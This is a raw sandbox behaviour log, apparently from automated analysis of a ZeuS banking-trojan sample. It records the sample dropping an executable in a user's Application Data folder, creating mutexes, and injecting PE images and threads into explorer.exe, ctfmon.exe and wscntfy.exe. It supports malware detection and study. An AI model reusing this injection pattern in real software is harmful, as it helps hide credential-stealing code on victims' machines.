\NLS\NlsSectionLocale read unknown 290000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2E0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 330000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 330000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 330000 24576 own pid readonly object name not found 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 340000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 340000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 370000 12288 own pid readonly success or wait 1
none query and write and read commit BD0000 16384 own pid read write success or wait 1
none query and write and read commit BD0000 16384 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1 3B05D3
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1 3B05D3
C:\WINDOWS\system32\shell32.dll read commit 930000 8462336 own pid readonly success or wait 1 3B05D3
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 930000 1056768 own pid execute success or wait 1 3B05D3
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1 3B05D3
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 3E0000 4096 own pid execute success or wait 1 3B05D3
C:\WINDOWS\WindowsShell.Manifest query and read commit 3E0000 4096 own pid readonly success or wait 1 3B05D3
C:\WINDOWS\WindowsShell.Manifest read commit 3E0000 4096 own pid readonly success or wait 1 3B05D3
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1 3B05D3
C:\WINDOWS\system32\comctl32.dll read commit 930000 618496 own pid readonly success or wait 1 3B05D3
\KnownDlls\WS2_32.dll write and read and execute unknown 930000 618496 own pid readonly object name not found 1 3B05D3
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 3B05D3
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1 3B05D3
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 3B05D3
\KnownDlls\CRYPT32.dll write and read and execute unknown 71AA0000 32768 own pid read write object name not found 1 3B05D3
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1 3B05D3
\KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1 3B05D3
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1 3B05D3
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 3B05D3
\KnownDlls\Normaliz.dll write and read and execute unknown 440000 36864 own pid read write conflicting addresses 1 3B05D3
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 3B05D3
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 3B05D3
\KnownDlls\NETAPI32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1 3B05D3
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1 3B05D3
Registry Activities:
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Okmaykid object name not found 1 419F57
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Local\{70C7FA5B-C2C6-5FB1-185B-81F8EE8A3A3D} success or wait 1 41546B
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-C250-CCC334817706} success or wait 2 414B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-AE51-CCC358807706} success or wait 2 414B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A252-CCC354837706} success or wait 2 414B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA52-CCC34C837706} success or wait 2 414B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E52-CCC398837706} success or wait 2 414B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7252-CCC384837706} success or wait 2 414B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA53-CCC34C827706} success or wait 2 414B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0E53-CCC3F8827706} success or wait 2 414B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-DA54-CCC32C857706} success or wait 2 414B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-8A54-CCC37C857706} success or wait 2 414B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BE54-CCC348857706} success or wait 2 414B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E55-CCC3E8847706} success or wait 2 414B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A256-CCC354877706} success or wait 1 414B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-E257-CCC314867706} success or wait 1 414B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0651-CCC3F0807706} success or wait 2 414B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-3A51-CCC3CC807706} success or wait 2 414B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0257-CCC3F4867706} success or wait 2 414B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2A50-CCC3DC817706} success or wait 1 414B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1252-CCC3E4837706} success or wait 2 414B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A654-CCC350857706} success or wait 2 414B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1657-CCC3E0867706} success or wait 2 414B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7658-CCC380897706} success or wait 2 414B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E58-CCC3E8897706} success or wait 2 414B82
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E57-CCC398867706} success or wait 1 414B82
Process Activities:
+ Process terminated
PID Filepath Completion Count Source Address
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe success or wait 1 415816
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe success or wait 0 415816
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
4008 1636 7C8106F9 true C:\WINDOWS\explorer.exe success or wait 1 40533E
1656 1828 7C8106F9 true C:\WINDOWS\system32\ctfmon.exe success or wait 1 40533E
2512 236 7C8106F9 true C:\WINDOWS\system32\wscntfy.exe success or wait 1 40533E
2544 1960 7C8106F9 true C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe success or wait 1 40533E
+ Thread resumed
TID PID Completion Count Source Address
4008 1636 success or wait 1 40533E
1656 1828 success or wait 1 40533E
2512 236 success or wait 1 40533E
2544 1960 success or wait 1 40533E
Memory Activities:
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
1636 C:\WINDOWS\explorer.exe 1F70000 159744 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 31 60 2D 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 08 02 00 00 3A 00 00 00 00 00 success or wait 1 41A688
1636 C:\WINDOWS\explorer.exe 1F92D50 4 00 00 00 00 success or wait 1 414C88
1636 C:\WINDOWS\explorer.exe 1F92D64 4 00 00 F7 01 success or wait 1 414CA8
1636 C:\WINDOWS\explorer.exe 1F93214 4 C0 02 00 00 success or wait 1 41442D
1636 C:\WINDOWS\explorer.exe 1F93218 4 90 02 00 00 success or wait 1 41442D
1828 C:\WINDOWS\system32\ctfmon.exe A30000 159744 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 31 60 2D 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 08 02 00 00 3A 00 00 00 00 00 success or wait 1 41A688
1828 C:\WINDOWS\system32\ctfmon.exe A52D50 4 00 00 00 00 success or wait 1 414C88
1828 C:\WINDOWS\system32\ctfmon.exe A52D64 4 00 00 A3 00 success or wait 1 414CA8
1828 C:\WINDOWS\system32\ctfmon.exe A53214 4 70 01 00 00 success or wait 1 41442D
1828 C:\WINDOWS\system32\ctfmon.exe A53218 4 74 01 00 00 success or wait 1 41442D
236 C:\WINDOWS\system32\wscntfy.exe AE0000 159744 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 31 60 2D 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 08 02 00 00 3A 00 00 00 00 00 success or wait 1 41A688
236 C:\WINDOWS\system32\wscntfy.exe B02D50 4 00 00 00 00 success or wait 1 414C88
236 C:\WINDOWS\system32\wscntfy.exe B02D64 4 00 00 AE 00 success or wait 1 414CA8
236 C:\WINDOWS\system32\wscntfy.exe B03214 4 9C 00 00 00 success or wait 1 41442D
236 C:\WINDOWS\system32\wscntfy.exe B03218 4 A0 00 00 00 success or wait 1 41442D
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe 380000 12FF1C page read and write success or wait 1 406915
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe 380000 12FF20 page read and write success or wait 1 406915
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe 381000 12FBFC page read and write success or wait 1 406915
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe 390000 12FEA4 page execute and read and write success or wait 1 4014B4
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe 390000 12FEA8 page execute and read and write success or wait 1 4014B4
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe 3B0000 12FEA8 page execute and read and write success or wait 1 40167E
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe 400000 12FD60 page execute and read and write success or wait 1 3B0F29
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe B50000 12F910 page read and write success or wait 1 414961
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe B50000 12F914 page read and write success or wait 1 414961
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe 181000 12F448 page read and write success or wait 1 4019F1
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe 182000 12F448 page read and write success or wait 1 4019F1
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe 183000 12F448 page read and write success or wait 1 4019F1
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe 184000 12F628 page read and write success or wait 1 4019F1
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe BD0000 12FAEC page read and write success or wait 1 41AED8
1636 C:\WINDOWS\explorer.exe 1F70000 12F850 page execute and read and write success or wait 1 41A5F6
1828 C:\WINDOWS\system32\ctfmon.exe A30000 12F850 page execute and read and write success or wait 1 41A5F6
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe B53000 12F5FC page read and write success or wait 3 4019F1
236 C:\WINDOWS\system32\wscntfy.exe AE0000 12F850 page execute and read and write success or wait 1 41A5F6
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe BF0000 12F850 page execute and read and write success or wait 1 41A5F6
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe 400000 1000 page read and write page readonly success or wait 1 4416D8
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe 400000 1000 page readonly page read and write success or wait 1 4416ED
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe 400000 27000 page execute and read and write page execute and read and write success or wait 1 3B0F37
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe 400000 1000 page readonly page execute and read and write success or wait 1 3B1199
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe 401000 21000 page execute read page execute and read and write success or wait 1 3B1217
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe 422000 3000 page read and write page execute and read and write success or wait 1 3B1217
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe 425000 2000 page readonly page execute and read and write success or wait 1 3B1217
1636 C:\WINDOWS\explorer.exe 1F70000 27000 page execute and read and write page execute and read and write success or wait 2 41A688
1636 C:\WINDOWS\explorer.exe 1F92D50 1000 page execute and read and write page execute and read and write success or wait 1 414C88
1636 C:\WINDOWS\explorer.exe 1F92000 1000 page execute and read and write page execute and read and write success or wait 2 414C88
1636 C:\WINDOWS\explorer.exe 1F92D64 1000 page execute and read and write page execute and read and write success or wait 1 414CA8
1636 C:\WINDOWS\explorer.exe 1F93214 1000 page execute and read and write page execute and read and write success or wait 1 41442D
1636 C:\WINDOWS\explorer.exe 1F93000 1000 page execute and read and write page execute and read and write success or wait 2 41442D
1636 C:\WINDOWS\explorer.exe 1F93218 1000 page execute and read and write page execute and read and write success or wait 1 41442D
1828 C:\WINDOWS\system32\ctfmon.exe A30000 27000 page execute and read and write page execute and read and write success or wait 2 41A688
1828 C:\WINDOWS\system32\ctfmon.exe A52D50 1000 page execute and read and write page execute and read and write success or wait 1 414C88
1828 C:\WINDOWS\system32\ctfmon.exe A52000 1000 page execute and read and write page execute and read and write success or wait 2 414C88
1828 C:\WINDOWS\system32\ctfmon.exe A52D64 1000 page execute and read and write page execute and read and write success or wait 1 414CA8
1828 C:\WINDOWS\system32\ctfmon.exe A53214 1000 page execute and read and write page execute and read and write success or wait 1 41442D
1828 C:\WINDOWS\system32\ctfmon.exe A53000 1000 page execute and read and write page execute and read and write success or wait 2 41442D
1828 C:\WINDOWS\system32\ctfmon.exe A53218 1000 page execute and read and write page execute and read and write success or wait 1 41442D
236 C:\WINDOWS\system32\wscntfy.exe AE0000 27000 page execute and read and write page execute and read and write success or wait 2 41A688
236 C:\WINDOWS\system32\wscntfy.exe B02D50 1000 page execute and read and write page execute and read and write success or wait 1 414C88
236 C:\WINDOWS\system32\wscntfy.exe B02000 1000 page execute and read and write page execute and read and write success or wait 2 414C88
236 C:\WINDOWS\system32\wscntfy.exe B02D64 1000 page execute and read and write page execute and read and write success or wait 1 414CA8
236 C:\WINDOWS\system32\wscntfy.exe B03214 1000 page execute and read and write page execute and read and write success or wait 1 41442D
236 C:\WINDOWS\system32\wscntfy.exe B03000 1000 page execute and read and write page execute and read and write success or wait 2 41442D
236 C:\WINDOWS\system32\wscntfy.exe B03218 1000 page execute and read and write page execute and read and write success or wait 1 41442D
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 2 4053A6
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 1978161742
Section loaded Path: none Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 1978165537
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 270000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 1978169171
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 290000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 1978170536
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2E0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 1978171661
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 1978172418
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 1978173871
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 1978174237
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 1978176773
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 1978179665
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 1978185194
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 1978186610
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 1978190065
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 1978194378
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 1978203737
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 1978210804
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 1978222644
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 1978225503
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 1978227817
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 370000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 1978242582
Memory attributes changed PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 400000 Length: 1000 New Protection: page read and write New Protection: page readonly success or wait 1978279772
Memory attributes changed PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 400000 Length: 1000 New Protection: page readonly New Protection: page read and write success or wait 1978280122
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 380000 Length: 12FF1C Allocation Type: null Protection: page read and write success or wait 1978280864
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 380000 Length: 12FF20 Allocation Type: null Protection: page read and write success or wait 1978281130
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 381000 Length: 12FBFC Allocation Type: null Protection: page read and write success or wait 1978281444
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 390000 Length: 12FEA4 Allocation Type: null Protection: page execute and read and write success or wait 1978283201
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 390000 Length: 12FEA8 Allocation Type: null Protection: page execute and read and write success or wait 1978283472
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 3B0000 Length: 12FEA8 Allocation Type: null Protection: page execute and read and write success or wait 1978284452
File opened Path: C:\Documents and Settings\Administrator\Application Data\887021879.log Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1981476670
File read Path: C:\Documents and Settings\Administrator\Application Data\887021879.log Offset: none Length: 5 Value: 31 36 37 39 30 success or wait 1981477059
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 400000 Length: 12FD60 Allocation Type: null Protection: page execute and read and write success or wait 1981497173
Memory attributes changed PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 400000 Length: 27000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1981497276
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 1981506475
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 1981508730
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 930000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 1981512860
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 930000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 1981529056
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 1981530061
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 3E0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 1981533876
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 3E0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1981535006
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 3E0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1981535904
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 1981548121
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 930000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 1981552755
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 930000 Size: 618496 Protection: readonly Mapped to pid: own pid object name not found 1981557163
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 1981557750
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 1981563867
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 1981564789
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 1981568282
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 1981568859
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 1981570070
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 1981570662
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 1981574731
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 440000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 1981576997
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 1981579577
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 1981582870
Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 1981627859
Section loaded Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 1981628441
Memory attributes changed PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 400000 Length: 1000 New Protection: page readonly New Protection: page execute and read and write success or wait 1981630534
Memory attributes changed PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 401000 Length: 21000 New Protection: page execute read New Protection: page execute and read and write success or wait 1981630640
Memory attributes changed PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 422000 Length: 3000 New Protection: page read and write New Protection: page execute and read and write success or wait 1981630853
Memory attributes changed PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 425000 Length: 2000 New Protection: page readonly New Protection: page execute and read and write success or wait 1981630954
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: B50000 Length: 12F910 Allocation Type: null Protection: page read and write success or wait 1981631185
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: B50000 Length: 12F914 Allocation Type: null Protection: page read and write success or wait 1981631284
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 181000 Length: 12F448 Allocation Type: null Protection: page read and write success or wait 1981634393
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 182000 Length: 12F448 Allocation Type: null Protection: page read and write success or wait 1981639226
